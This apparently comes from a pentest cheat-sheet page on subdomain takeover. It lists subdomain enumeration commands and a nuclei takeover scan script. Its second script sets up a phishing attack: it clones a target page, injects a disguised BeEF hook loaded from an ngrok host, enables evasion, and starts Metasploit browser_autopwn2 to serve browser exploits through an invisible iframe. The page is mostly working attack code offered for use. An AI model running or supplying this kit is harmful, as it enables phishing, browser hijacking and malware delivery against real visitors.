Subdomain Takeover
Check List
Cheat Sheet
Subdomain Fuzzing
dnsenum $WEBSITE \
-f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txtdnsrecon -d $WEBSITE \
-D /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
-t brtgobuster dns --wildcard \
-d $WEBSITE \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txtDNS Recon
dig CNAME subdomain.$WEBSITEamass enum -d $WEBSITEdnsenum $WEBSITEdnsrecon -d $WEBSITEsublist3r -d $WEBSITERecon Sub
host $WEBSITERecon IP
whois $TARGET | grep "OrgName"Checklist Providers
Create Script
sudo nano sub-takeover.sh#!/bin/bash
# Check if script is running as root
if [ "$(id -u)" -ne 0 ]; then
echo "[-] Please run as root: sudo ./subtakeover.sh <DOMAIN>"
exit 1
fi
# Check for required argument
if [ $# -ne 1 ]; then
echo "Usage: sudo ./subtakeover.sh <DOMAIN>"
exit 1
fi
DOMAIN=$1
echo "1.1.1.1" > /tmp/resolvers.txt
echo "[+] Finding subdomains for $DOMAIN..."
subfinder -d "$DOMAIN" -all > /tmp/available.txt
echo "[+] Resolving subdomains using shuffledns..."
shuffledns -d "$DOMAIN" \
-list /tmp/available.txt \
-r /tmp/resolvers.txt \
-mode resolve \
-o /tmp/subdomains.txt
echo "[+] Checking for subdomain takeover vulnerabilities..."
nuclei -tags takeover -l /tmp/subdomains.txtRun Script
sudo chmod +x sub-takeover.sh;sudo ./sub-takeover.sh -d $WEBSITECreate Script
sudo nano beef-sub-takeover.sh#!/bin/bash
RED='\e[1;31m'
GREEN='\e[1;32m'
YELLOW='\e[1;33m'
CYAN='\e[1;36m'
RESET='\e[0m'
URL='$1'
# Check for ROOT
if [[ "$(id -u)" -ne 0 ]]; then
echo -e "${RED}[X] Please run as ROOT...${NC}"
echo -e "${GREEN}[*] sudo ./takeover.sh <URL>${NC}"
exit 1
fi
# Check for argument
if [[ $# -ne 1 ]]; then
echo -e "${RED}[X] Please provide a URL...${NC}"
echo -e "${GREEN}[*] sudo ./takeover.sh <URL>${NC}"
exit 1
fi
# Get current user and LAN/WAN IP address
LAN=$(hostname -I | awk '{print $1}')
WAN=$(curl -s https://api.ipify.org)
# Kill any running instances of ngrok and ruby
pkill -f 'ngrok|ruby'
# Run Ngrok
msfconsole -qx "load msgrpc ServerHost=$LAN Pass=abc123 SSL=y;use auxiliary/server/browser_autopwn2;set LHOST $WAN;set URIPATH /pwn;run -z" >/dev/null 2>&1 &
sleep 1
ngrok http 3000 &>/dev/null &
sleep 3
NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')
printf "${GREEN}[*] ngrok started successfully...${RESET}\n"
# Config BeEF
if grep -q "https: false" /usr/share/beef-xss/config.yaml; then
sed -i -e 's|user: "beef"|user: "unk9vvn"|g' \
-e 's|passwd: "beef"|passwd: "00980098"|g' \
-e 's|# public:|public:|g' \
-e 's|# host: "" # public| host: "'$NGHOST'" # public|' \
-e 's|# port: "" # public| port: "443" # public|g' \
-e 's|# https: false| https: true|g' \
-e 's|allow_reverse_proxy: false|allow_reverse_proxy: true|g' \
-e 's|hook.js|jqueryctl.js|g' \
-e 's|BEEFHOOK|UNKSESSION|g' /usr/share/beef-xss/config.yaml
sed -i -e 's|enable: false|enable: true|g' \
-e 's|host: "127.0.0.1"|host: "'$LAN'"|g' \
-e 's|callback_host: "127.0.0.1"|callback_host: "'$LAN'"|g' \
-e 's|auto_msfrpcd: false|auto_msfrpcd: true|g' /usr/share/beef-xss/extensions/metasploit/config.yaml
sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/modules/metasploit/browser_autopwn/config.yaml
sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/extensions/evasion/config.yaml
else
sed -i -e 's|user: "beef"|user: "unk9vvn"|g' \
-e 's|passwd: "beef"|passwd: "00980098"|g' \
-e 's|# public:|public:|g' \
-e 's|host: ".*" # public|host: "'$NGHOST'" # public|' \
-e 's|port: ".*" # public|port: "443" # public|g' \
-e 's|https: false|https: true|g' \
-e 's|allow_reverse_proxy: false|allow_reverse_proxy: true|g' \
-e 's|hook.js|jqueryctl.js|g' \
-e 's|BEEFHOOK|UNKSESSION|g' /usr/share/beef-xss/config.yaml
sed -i -e 's|enable: false|enable: true|g' \
-e 's|host: ".*"|host: "'$LAN'"|g' \
-e 's|callback_host: ".*"|callback_host: "'$LAN'"|g' \
-e 's|auto_msfrpcd: false|auto_msfrpcd: true|g' /usr/share/beef-xss/extensions/metasploit/config.yaml
sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/modules/metasploit/browser_autopwn/config.yaml
sed -i -e 's|enable: false|enable: true|g' /usr/share/beef-xss/extensions/evasion/config.yaml
fi
printf "${GREEN}[*] BeEF with new configuration...${RESET}\n"
# Start BeEF XSS framework
cd /usr/share/beef-xss && ./beef -x &>/dev/null &
# Create the Phishing Page
wget -O /tmp/index.html -c -k -q -U \
"Mozilla/5.0 (Macintosh; Intel MacOS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" $URL
# inject script beef
sed -i "s|</body>|<script>function myFunction(){var x = document.createElement('SCRIPT');x.src='https://${NGHOST}/jqueryctl.js';document.body.appendChild(x);};myFunction();</script>\n</body>|g" /tmp/index.html
clear
printf "\n\n"
printf "${YELLOW}Save Phishing Page: /tmp/index.html\n"
printf "\n"
printf "${CYAN}BeEF Panel: https://${NGHOST}/ui/panel${RESET}\n"
printf "${CYAN}BeEF USER: unk9vvn${RESET}\n"
printf "${CYAN}BeEF PASS: 00980098${RESET}\n"
printf "\n"
printf "${GREEN}BeEF Panel > Commands > Misc > Create Invisible Iframe > URL: http://$WAN:8080/pwn > Execute${RESET}\n"Script Run
sudo chmod +x beef-sub-takeover.sh;sudo ./beef-sub-takeover.sh $WEBSITELast updated
Was this helpful?